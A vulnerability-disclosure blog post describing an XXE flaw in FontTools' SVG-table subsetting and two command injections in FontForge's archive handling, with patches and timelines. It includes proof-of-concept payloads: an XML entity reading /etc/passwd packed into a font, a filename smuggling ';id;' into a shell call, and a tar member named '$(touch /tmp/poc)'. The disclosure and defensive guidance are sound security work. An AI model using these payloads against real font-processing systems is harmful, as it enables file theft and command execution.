Fonts are still a Helvetica of a Problem - Canva Engineering Blog (2024)

At Canva, we’re continuously looking for ways to uplift the security of our processes, software, supply chain, and tools on our road to building the world’s most trusted platform. Canva processes millions of files across a broad range of graphics formats every day. To help us do this effectively, we use many open source tools and libraries. Building on existing research, we thought to look at less explored attack surfaces, such as fonts, which present a complex and prevalent part of graphics processing.

The following sections describe some vulnerabilities we discovered while exploring this line of thinking and demonstrate how security issues manifest in font processing tools.

Fonts have a long and convoluted history that predates computing by many years, reaching back to the early printing press. When bitmaps first brought fonts to the digital realm, few could imagine where we’d end up today.


The current font landscape contains many specifications, each created for unique use cases as required by corporations and individuals alike. This situation leaves font processing software developers with a difficult challenge, requiring them to interpret vast specifications across many formats. Where there is such complexity, there is also plenty of attack surface.

This is not a new idea. In 2015, Google’s Project Zero released a series of blog posts on font security vulnerability research, and the following year, some blog posts focused on fuzzing for font handling vulnerabilities in the Windows kernel. In response to this research, the community made some significant changes, including creating the OpenType Sanitizer project and adopting it in Chrome and Firefox.

Although the previous research focused primarily on memory corruption bugs in font processing, we wondered what other kinds of security issues might occur when handling fonts.

The attack surface of SVG and XML parsers is a well-documented problem in the web security field (see PortSwigger and OWASP). However, we were surprised to discover that the SVG format also appears in digital typography in two distinct ways.

Font formats that follow the sfnt container structure, like OpenType and TrueType, contain a number of tables needed for the font to work as intended. However, there are also many auxiliary tables, some of which are poorly documented or proprietary. One such auxiliary table is the SVG table.

The SVG table supports supplying SVG definitions for glyphs in a font and is one of several ways color fonts are supported.
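To make the container layout concrete, here is a minimal sketch of reading an sfnt table directory and checking whether it lists an SVG table. It assumes a single-font file (not a TTC collection or a WOFF wrapper) and relies only on the documented layout: a 12-byte header followed by one 16-byte record per table. The function names `list_table_tags` and `has_svg_table` are made up for this illustration and are not part of any library.

```python
import struct
from typing import List

# sfntVersion, numTables, searchRange, entrySelector, rangeShift
SFNT_HEADER = struct.Struct(">IHHHH")
# tag, checksum, offset, length
TABLE_RECORD = struct.Struct(">4sIII")


def list_table_tags(data: bytes) -> List[str]:
    """Return the four-character tags listed in an sfnt table directory."""
    if len(data) < SFNT_HEADER.size:
        raise ValueError("too short to be an sfnt font")
    _version, num_tables, _, _, _ = SFNT_HEADER.unpack_from(data, 0)
    tags = []
    for index in range(num_tables):
        offset = SFNT_HEADER.size + index * TABLE_RECORD.size
        if offset + TABLE_RECORD.size > len(data):
            raise ValueError("table directory is truncated")
        tag, _checksum, _table_offset, _length = TABLE_RECORD.unpack_from(data, offset)
        tags.append(tag.decode("latin-1"))
    return tags


def has_svg_table(data: bytes) -> bool:
    # Tags are padded to four bytes, hence the trailing space in "SVG ".
    return "SVG " in list_table_tags(data)
```

A pipeline that never needs color glyphs could use a check like this to decide whether a font deserves extra scrutiny before any XML parsing happens.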

Alternatively, it’s also possible, although deprecated (as of SVG 2), to define a font under the SVG specification itself. Such fonts are called SVG fonts. SVG fonts arose from a desire to support font description capabilities under SVG while web fonts (WOFF) were still being adopted. To embed a font in an SVG, the <font> element is used along with some other ingredients like a <font-face-src>, which points to the actual font definition (for example, a local TTF file).

We wondered then if we could reproduce well-understood SVG and XML handling vulnerabilities in the world of font processing.

Gained in translation - CVE-2023-45139

Fonts have the potential to be quite large, especially when they support a large variety of scripts (languages) or contain many glyphs, like CJK (Chinese, Japanese, Korean) fonts. Two common performance-enhancing operations are compression and subsetting.

Font compression is an important optimization that is largely achieved by converting TrueType and OpenType fonts to the WOFF format.

Subsetting takes a specific selection of a font’s glyphs (a subset) and extracts them to a standalone file. A great use case for subsetting is removing unneeded scripts from a font when the client’s desired language is known. In such a case, only the glyphs required to represent the characters in a client’s language need be sent to the client’s browser.


FontTools is a Pythonic do-it-all utility for working with fonts. Although subsetting can be a relatively naive operation (simply extracting glyphs matching a Unicode or character range), FontTools’ implementation performs additional size-reducing optimizations.
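The "relatively naive" form of subsetting can be sketched in a few lines. This is a toy model, not how FontTools implements it: the character map is a plain dictionary from code point to glyph name, and the helper name `naive_subset` is hypothetical.

```python
from string import ascii_letters
from typing import Dict


def naive_subset(cmap: Dict[int, str], text: str) -> Dict[int, str]:
    """Keep only the character-map entries needed to render `text`."""
    wanted = {ord(ch) for ch in text}
    return {cp: glyph for cp, glyph in cmap.items() if cp in wanted}


# A toy character map covering the ASCII letters.
full_cmap = {ord(c): c for c in ascii_letters}
subset_cmap = naive_subset(full_cmap, "Canva")
print(sorted(subset_cmap.values()))
```

A real subsetter also has to follow references from the retained glyphs into other tables (composite glyphs, layout features, and the SVG table discussed next), which is where the additional parsing comes from.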

FontTools version 4.28.2 added support for subsetting the SVG table for use in glyph coloring. To do this, the SVG table needs to be parsed to extract glyphIds matching those specified to be included in the subset.

Looking at how FontTools processes the SVG table in OTF fonts, we can see that by default, the lxml XML parser resolves entities. So, if the parser walks an untrusted XML file, an XML External Entity (XXE) vulnerability occurs.

svg = etree.fromstring(
    # encode because fromstring dislikes xml encoding decl if input is str.
    # SVG xml encoding must be utf-8 as per OT spec.
    doc.data.encode("utf-8"),
    parser=etree.XMLParser(
        # Disable libxml2 security restrictions to support very deep trees.
        # Without this we would get an error like this:
        # `lxml.etree.XMLSyntaxError: internal error: Huge input lookup`
        # when parsing big fonts e.g. noto-emoji-picosvg.ttf.
        huge_tree=True,
        # ignore blank text as it's not meaningful in OT-SVG; it also prevents
        # dangling tail text after removing an element when pretty_print=True
        remove_blank_text=True,
    ),
)

python

Proof of concept

Knowing the XML parser used for subsetting the SVG table is misconfigured to allow for the resolution of arbitrary entities, we can construct an XML payload to include /etc/passwd.

<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY poc SYSTEM 'file:///etc/passwd'>]>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <g id="glyph1">
    <text font-size="10" x="0" y="10">&poc;</text>
  </g>
</svg>

xml

We then need to pack the XML definition into the SVG table so that it’s valid enough to be subset by FontTools. We can write a script to help us here by repurposing an existing FontTools integration test to quickly create a valid font.

from string import ascii_letters

from fontTools.fontBuilder import FontBuilder
from fontTools.pens.ttGlyphPen import TTGlyphPen
from fontTools.ttLib import newTable

XXE_SVG = """\
<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY poc SYSTEM 'file:///etc/passwd'>]>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <g id="glyph1">
    <text font-size="10" x="0" y="10">&poc;</text>
  </g>
</svg>
"""


def main():
    # generate a random TTF font with an SVG table
    glyph_order = [".notdef"] + list(ascii_letters)
    pen = TTGlyphPen(glyphSet=None)
    pen.moveTo((0, 0))
    pen.lineTo((0, 500))
    pen.lineTo((500, 500))
    pen.lineTo((500, 0))
    pen.closePath()
    glyph = pen.glyph()
    glyphs = {g: glyph for g in glyph_order}

    fb = FontBuilder(unitsPerEm=1024, isTTF=True)
    fb.setupGlyphOrder(glyph_order)
    fb.setupCharacterMap({ord(c): c for c in ascii_letters})
    fb.setupGlyf(glyphs)
    fb.setupHorizontalMetrics({g: (500, 0) for g in glyph_order})
    fb.setupHorizontalHeader()
    fb.setupOS2()
    fb.setupPost()
    fb.setupNameTable({"familyName": "TestSVG", "styleName": "Regular"})

    svg_table = newTable("SVG ")
    svg_table.docList = [
        (XXE_SVG, 1, 12)
    ]
    fb.font["SVG "] = svg_table
    fb.font.save('poc-payload.ttf')


if __name__ == '__main__':
    main()

python

When we run the produced poc-payload.ttf against the FontTools subsetting utility, it produces a subsetted font with the following SVG table, which includes the entity resolved to the /etc/passwd file.

pyftsubset poc-payload.ttf --output-file="poc-payload.subset.ttf" --unicodes="*" --ignore-missing-glyphs
ttx -t SVG poc-payload.subset.ttf && cat poc-payload.subset.ttx

bash

<?xml version="1.0" encoding="UTF-8"?>
<ttFont sfntVersion="\x00\x01\x00\x00" ttLibVersion="4.42">
  <SVG>
    <svgDoc endGlyphID="12" startGlyphID="1">
      <![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><g id="glyph1"><text font-size="10" x="0" y="10">##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false

xml

Patch and timeline

Following responsible disclosure, the maintainers were swift to implement a patch, which disabled entity resolution (that is, XMLParser(resolve_entities=False)), shortly followed by a release including the fix.

  • September 13, 2023: Reported issue to FontTools maintainers.
  • September 16, 2023: FontTools maintainers release a patch.
  • October 12, 2023: CVE issued by GitHub.
  • January 09, 2024: Advisory published by the maintainers.
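The fix itself is the lxml parser setting quoted above. As a complementary, defence-in-depth idea (not part of the FontTools patch), a pipeline could refuse any SVG document that declares entities before handing it to a full parser. The sketch below uses only the standard library's expat bindings; the names `EntityDeclared` and `reject_entity_declarations` are hypothetical.

```python
from xml.parsers import expat


class EntityDeclared(ValueError):
    """Raised when an XML document declares an entity in its DTD."""


def reject_entity_declarations(xml_bytes: bytes) -> None:
    """Raise EntityDeclared if the document declares any entity."""
    parser = expat.ParserCreate()

    def on_entity_decl(name, is_parameter_entity, value, base,
                       system_id, public_id, notation_name):
        # Called by expat for every <!ENTITY ...> declaration it encounters.
        raise EntityDeclared(f"entity {name!r} declared (system id: {system_id!r})")

    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_bytes, True)


PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY poc SYSTEM 'file:///etc/passwd'>]>
<svg xmlns="http://www.w3.org/2000/svg"><text>&poc;</text></svg>
"""

try:
    reject_entity_declarations(PAYLOAD)
except EntityDeclared as exc:
    print("rejected:", exc)
```

Legitimate OT-SVG glyph documents rarely need a DTD at all, so rejecting entity declarations outright is usually an acceptable trade-off; whether it is acceptable for a given pipeline is an assumption to verify.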

Historically, for size reduction, it was desirable to pack multiple fonts (of the same or different formats) into one file. The TrueType Collection (TTC) and Suitcase font formats were established to do this.


To handle these formats, font software authors developed esoteric naming conventions as a convenience mechanism for users to work with such files.

Tools like FontForge and ImageMagick adopted the naming convention of using parentheses after the filename (for example, Alef-Regular.dfont(1)) to allow users to specify the desired font inside the collection to edit. FontForge refers to such files collectively as ‘subfonts’.

This is noteworthy because it highlights the need to preserve the filename, which can lead to security challenges when operating on untrusted data.
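As an illustration of the parenthesis convention, the following sketch splits a name such as Alef-Regular.dfont(1) into the file path and the subfont selector. It is a simplified assumption of how such names could be parsed, not FontForge's or ImageMagick's actual logic, and `split_subfont` is a hypothetical helper.

```python
import re
from typing import Optional, Tuple

# A trailing "(...)" group is treated as the subfont selector.
_SUBFONT_RE = re.compile(r"^(?P<path>.+)\((?P<selector>[^()]*)\)$")


def split_subfont(name: str) -> Tuple[str, Optional[str]]:
    """Split 'file(selector)' into (file, selector); selector is None if absent."""
    match = _SUBFONT_RE.match(name)
    if match is None:
        return name, None
    return match.group("path"), match.group("selector")


print(split_subfont("Alef-Regular.dfont(1)"))
print(split_subfont("Alef-Regular.ttf"))
```

Because the selector is carried inside the filename, any code that renames or aggressively sanitizes the file before processing risks losing it, which is the tension the section describes.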

:(){ :|:& };:.zip - CVE-2024-25081

When FontForge handles archive files, which it identifies by the input file’s extension, it extracts the files from the archive by leveraging the cross-platform system() libc API. Ordinarily, this could be okay because the only user-controlled data would be the filename, which could be sanitized. However, preserving the original filename can be crucial to support working with subfonts.

Therefore, when assembling the command string for the archive list command, the original filename is used, leading to a command injection vulnerability.

listcommand = malloc( strlen(archivers[i].unarchive) + 1 +
                      strlen( archivers[i].listargs) + 1 +
                      strlen( name ) + 3 +
                      strlen( listfile ) +4 );
sprintf( listcommand,
         "%s %s %s > %s",
         archivers[i].unarchive,
         archivers[i].listargs,
         name,
         listfile );
if ( system(listcommand)!=0 ) {
    //error handling
}

c

Proof of concept

Knowing that a filename with an archive extension will make its way to this sink, we can construct a simple proof of concept to demonstrate shell execution by including shell escape or subshell tokens in the filename.

touch archive.zip\;id\;.zip

bash

When supplied to FontForge’s Open() procedure, the id command result is printed to stdout.

fontforge -lang=ff -c 'Open($1);' archive.zip\;id\;.zip /tmp/zip.ttf

bash

Copyright (c) 2000-2024. See AUTHORS for Contributors.
# [SNIP]
sh: 1: unzip: not found
uid=0(root) gid=0(root) groups=0(root)
sh: 1: .zip: not found
# [SNIP]

bash
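The three shell messages in that output correspond to three separate commands. To see why, the sketch below rebuilds the command string with the same "%s %s %s > %s" layout and tokenizes it roughly the way a shell would, without executing anything. The "-l" list argument and the /tmp/list path are placeholders assumed for illustration, and the combined punctuation_chars and whitespace_split behaviour relied on here needs Python 3.8 or later.

```python
import shlex
from typing import List


def build_list_command(unarchive: str, listargs: str, name: str, listfile: str) -> str:
    # Same layout as the "%s %s %s > %s" format string in the FontForge excerpt.
    return f"{unarchive} {listargs} {name} > {listfile}"


def shell_like_tokens(command: str) -> List[str]:
    """Tokenize a command line, splitting out shell punctuation such as ';'."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


hostile = "archive.zip;id;.zip"

# Unquoted: the ';' characters become command separators.
print(shell_like_tokens(build_list_command("unzip", "-l", hostile, "/tmp/list")))

# Quoted with shlex.quote: the filename stays a single word.
print(shell_like_tokens(build_list_command("unzip", "-l", shlex.quote(hostile), "/tmp/list")))
```

Quoting is shown only to contrast the two tokenizations. It is easy to get wrong across platforms, which is one reason to avoid the shell entirely.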

Patch and timeline

After liaising with the FontForge maintainers, we submitted a patch we developed, which was later merged by the maintainers.

  • January 19, 2024: Reported issue to FontForge maintainers.

  • February 6, 2024: Raised a pull request for the patch and merged it into the FontForge main branch.

Font compression is a popular choice for web fonts because it can reduce the amount of data downloaded by clients and improve web page responsiveness. WOFF and WOFF2 (font types developed for the web) were specifically designed to use compression, with WOFF using zlib and WOFF2 using Brotli (which offers a 30% reduction in file size).

However, other font formats (such as TTF) don’t natively support compression, and file sizes can be quite large. There are ways to remedy this. For example, Google Fonts lets you dynamically subset a font to only what you need, gaining up to a 90% reduction in file size.

Fonts are also commonly distributed as archive files, both for compression and for bundling many font families together. Tools like FontForge now include support for dealing with archive files. Some tools (such as ExifTool) can even reach into the archive file and modify files in situ; FontForge, however, first extracts the fonts into a temporary directory to work on them.

Font tartare - CVE-2024-25082

A vulnerability was discovered when FontForge parses the Table of Contents (TOC) for an archive file. The TOC is a list of all the files compressed in the archive and FontForge uses this to pull a font file out to perform actions on.

The filename comes from the ArchiveParseTOC function, which means we can create an archive containing a malicious filename, bypassing traditional filename sanitization techniques, and triggering our exploit. As stated previously, filenames are important when dealing with fonts and this is another example of why it can be tricky to sanitize them.

// Retrieves the first filename in the archive
desiredfile = ArchiveParseTOC(listfile, archivers[i].ars, &doall);

// ... some checks ...

unarchivecmd = malloc(strlen(archivers[i].unarchive) + 1 +
                      strlen( archivers[i].listargs) + 1 +
                      strlen( name ) + 1 +
                      strlen( desiredfile ) + 3 +
                      strlen( archivedir ) + 30 );
sprintf(unarchivecmd,
        "( cd %s ; %s %s %s %s ) > /dev/null",
        archivedir,
        archivers[i].unarchive,
        archivers[i].extractargs,
        name,
        doall ? "" : desiredfile );
if ( system(unarchivecmd)!=0 ) {
    // error handling
}

c

Using this, it’s possible to get command injection in FontForge, either running in server mode or in the desktop application.

Proof of concept

Knowing that FontForge unsafely handles the first filename in an archive, we were able to craft a malicious payload containing system commands to be executed. The POC script below generates a .tar archive file with our exploit as the first file.

#!/usr/bin/env python3
import tarfile

# The member name is the payload: FontForge later pastes it into a shell command.
exec_command = "$(touch /tmp/poc)"

with tarfile.open("poc.tar", "w", format=tarfile.USTAR_FORMAT) as t:
    t.addfile(tarfile.TarInfo(exec_command))

python

Using the tar tf poc.tar command, we can list all of the files in the archive.

$ tar tf poc.tar
$(touch /tmp/poc)
$ cat poc.tar
$(touch /tmp/poc)0000644000000000000000000000000000000000000010606 0ustar00

bash

Similar to CVE-2024-25081, we can open the file with FontForge and observe that our exploit triggers. Whether the file is opened through the CLI or GUI makes no difference (except for operating system-specific commands).
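From the defender's side, a service that accepts archives could inspect member names before any tool touches them. The sketch below is one possible pre-check under a deliberately conservative allowlist; it is not what FontForge does, and the helper names and the allowlist itself are assumptions for illustration.

```python
import io
import re
import tarfile
from typing import List

# Letters, digits, dot, underscore, hyphen, slash, and space only.
_SAFE_NAME = re.compile(r"[A-Za-z0-9._/ -]+")


def flag_member_names(archive_bytes: bytes) -> List[str]:
    """Return archive member names that fall outside the allowlist."""
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:") as archive:
        return [name for name in archive.getnames()
                if not _SAFE_NAME.fullmatch(name)]


def build_demo_archive() -> bytes:
    """Build an in-memory tar with one benign and one hostile member name."""
    buffer = io.BytesIO()
    with tarfile.open(fileobj=buffer, mode="w", format=tarfile.USTAR_FORMAT) as archive:
        archive.addfile(tarfile.TarInfo("Alef-Regular.ttf"))
        archive.addfile(tarfile.TarInfo("$(touch /tmp/poc)"))
    return buffer.getvalue()


print(flag_member_names(build_demo_archive()))
```

Note that this allowlist would also flag subfont-style names containing parentheses, which illustrates why filename sanitization alone is an awkward fit for font tooling.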

Patch and timeline

The patch involved replacing all of the system() calls with the g_spawn_sync or g_spawn_async functions because the GLib spawn calls don’t run in a shell environment. Commands are passed as an explicit argument vector, so filenames are never interpreted by a shell and system commands can be executed safely.

-    snprintf( buf, sizeof(buf), "%s < %s > %s", compressors[compression].decomp, name, tmpfn );
-    if ( system(buf)==0 )
-        return( tmpfn );
-    free(tmpfn);
-    return( NULL );
+    command[0] = compressors[compression].decomp;
+    command[1] = "-c";
+    command[2] = name;
+    command[3] = NULL;
+
+    if (!g_spawn_async_with_pipes(
+            NULL,
+            command,
+            NULL,
+            G_SPAWN_DO_NOT_REAP_CHILD | G_SPAWN_SEARCH_PATH,
+            NULL,
+            NULL,
+            NULL,
+            NULL,
+            &stdout_pipe,
+            NULL,
+            NULL)) {
+        //command has failed
+        return( NULL );
+    }
+
+    // Read from the pipe.
+    while ((bytes_read = read(stdout_pipe, buffer, sizeof(buffer))) > 0) {
+        g_byte_array_append(binary_data, (guint8 *)buffer, bytes_read);
+    }
+    close(stdout_pipe);
+
+    FILE *fp = fopen(tmpfn, "wb");
+    fwrite(binary_data->data, sizeof(gchar), binary_data->len, fp);
+    fclose(fp);
+    g_byte_array_free(binary_data, TRUE);

diff

The timeline corresponds to that of CVE-2024-25081.
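The same principle applies outside C. As a rough Python analogue of the g_spawn approach (an illustration, not part of the FontForge patch), passing an argument list to subprocess.run without a shell delivers a hostile filename to the child process as a single, uninterpreted argument. The child here is simply the current Python interpreter echoing its first argument, and `run_without_shell` is a hypothetical helper name.

```python
import subprocess
import sys
from typing import List


def run_without_shell(argv: List[str]) -> str:
    """Run a command from an argument vector; no shell ever parses it."""
    completed = subprocess.run(argv, capture_output=True, text=True, check=True)
    return completed.stdout


hostile = "$(touch /tmp/poc);id;.zip"
echo_first_argument = [sys.executable, "-c", "import sys; print(sys.argv[1])", hostile]

# The child receives the filename verbatim, metacharacters included.
print(run_without_shell(echo_first_argument), end="")
```

The trade-off is that shell conveniences such as redirection are no longer available, which is why the patch reads the child's output from a pipe and writes the temporary file itself.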

Fonts are complicated and safely handling them is a difficult problem to solve. You should treat fonts like any other untrusted input:

  • Implement sandboxing for anything that processes fonts.
  • Employ tools like OpenType-Sanitizer.

It can be difficult for maintainers to handle security problems, so having security engineers provide patching can speed up the process and build rapport with the open source community. We’d like to thank all the maintainers of open source font software and tools for their hard work. Finally, we hope to see more font security research in the future because we believe it’s an area still lacking in security maturity.
